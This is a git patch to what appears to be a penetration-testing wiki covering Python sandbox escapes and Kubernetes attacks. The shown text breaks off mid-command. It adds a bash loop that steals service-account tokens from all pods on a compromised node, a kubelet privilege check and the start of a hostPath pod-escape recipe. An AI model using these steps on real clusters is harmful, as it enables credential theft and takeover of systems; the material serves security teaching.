From 8a0c6374c5f7972e572d28a57dafca28f0928c16 Mon Sep 17 00:00:00 2001 From: CPol Date: Thu, 23 Dec 2021 12:20:46 +0000 Subject: [PATCH] GitBook: [#2911] No subject --- .../bypass-python-sandboxes/README.md | 27 +--------- pentesting/pentesting-kubernetes/README.md | 4 ++ .../attacking-kubernetes-from-inside-a-pod.md | 39 +++++++++++--- .../enumeration-from-a-pod.md | 10 +++- .../hardening-roles-clusterroles.md | 54 ++++++++++++++++++- 5 files changed, 98 insertions(+), 36 deletions(-) diff --git a/misc/basic-python/bypass-python-sandboxes/README.md b/misc/basic-python/bypass-python-sandboxes/README.md index ca6bf000..4f54c147 100644 --- a/misc/basic-python/bypass-python-sandboxes/README.md +++ b/misc/basic-python/bypass-python-sandboxes/README.md @@ -830,31 +830,7 @@ f(42) ## Decompiling Compiled Python -Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code. - -**Check out this tutorial**: - -{% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %} -[.pyc.md](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) -{% endcontent-ref %} - -## Misc Python - -### Assert - -Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\ -Therefore, checks like - -```python -def check_permission(super_user): - try: - assert(super_user) - print("\nYou are a super user\n") - except AssertionError: - print(f"\nNot a Super User!!!\n") -``` - -will be bypassed +Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code ## References @@ -863,4 +839,3 @@ will be bypassed * [https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/](https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/) * [https://gynvael.coldwind.pl/n/python\_sandbox\_escape](https://gynvael.coldwind.pl/n/python\_sandbox\_escape) * [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html) -* [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6) diff --git a/pentesting/pentesting-kubernetes/README.md b/pentesting/pentesting-kubernetes/README.md index a79d64f5..4257a609 100644 --- a/pentesting/pentesting-kubernetes/README.md +++ b/pentesting/pentesting-kubernetes/README.md @@ -48,3 +48,7 @@ Another important details about enumeration and Kubernetes permissions abuse is [hardening-roles-clusterroles.md](hardening-roles-clusterroles.md) {% endcontent-ref %} +## Labs to practice and learn + +* [https://securekubernetes.com/](https://securekubernetes.com) +* [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html) diff --git a/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md b/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md index e57ebdd1..dea52187 100644 --- a/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md +++ b/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md @@ -20,14 +20,6 @@ You can check this **docker breakouts to try to escape** from a pod you have com [docker-breakout](../../linux-unix/privilege-escalation/docker-breakout/) {% endcontent-ref %} -If you managed to escape from the container there are some interesting things you will find in the node: - -* The **Kubelet** service listening -* The **Kube-Proxy** service listening -* The **Container Runtime** process (Docker) -* More **pods/containers** running in the node you can abuse like this one (more tokens) -* The whole **filesystem** and **OS** in general - ### Abusing Kubernetes Privileges As explained in the section about **kubernetes enumeration**: @@ -94,3 +86,34 @@ In case the **compromised pod is running some sensitive service** where other po ## Automatic Tools * [https://github.com/inguardians/peirates](https://github.com/inguardians/peirates) + +## Node Post-Exploitation + +If you managed to **escape from the container** there are some interesting things you will find in the node: + +* The **Container Runtime** process (Docker) +* More **pods/containers** running in the node you can abuse like this one (more tokens) +* The whole **filesystem** and **OS** in general +* The **Kube-Proxy** service listening +* The **Kubelet** service listening: Check `/var/lib/kubelet/` specially `/var/lib/kubelet/kubeconfig` + +```bash +# Check Kubelet privileges +kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system + +# Steal the tokens from the pods running in the node +## The most interesting one is probably the one of kube-system +ALREADY="IinItialVaaluE" +for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do + TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/')) + if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then + ALREADY="$ALREADY|$TOKEN" + echo "Directory: $i" + echo "Namespace: $(cat $i)" + echo "" + echo $TOKEN + echo "================================================================================" + echo "" + fi +done +``` diff --git a/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md b/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md index cce28ed7..522534ab 100644 --- a/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md +++ b/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md @@ -377,7 +377,15 @@ https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/batch/v1bet {% endtab %} {% endtabs %} -**** +### **Get Pods consumptions** + +{% tabs %} +{% tab title="kubectl" %} +``` +./kubectl top pod --all-namespaces +``` +{% endtab %} +{% endtabs %} ### Escaping from the pod diff --git a/pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md b/pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md index b7be081a..7529ff3f 100644 --- a/pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md +++ b/pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md @@ -91,7 +91,7 @@ So just create the malicious pod and expect the secrets in port 6666: ![](<../../.gitbook/assets/image (464).png>) -### **Pod Creation - Mount Root (pod escape)** +### **Pod Creation & Escape - Mount Root** Having Pod create permissions over kube-system you can also be able to mount directories from the node hosting the pods with a pod template like the following one: @@ -125,6 +125,58 @@ kubectl --token $token create -f mount_root.yaml And capturing the reverse shell you can find the `/` directory (the entire filesystem) of the node mounted in `/mnt` inside the pod. +**Instead of getting a reverse shell you might just wanto to execute a pod using kubectl with the filesystem mounted and get a shell on it:** + +1. Create a "hostpath volume mount" `pod` manifest. + + ``` + cat > hostpath.yml <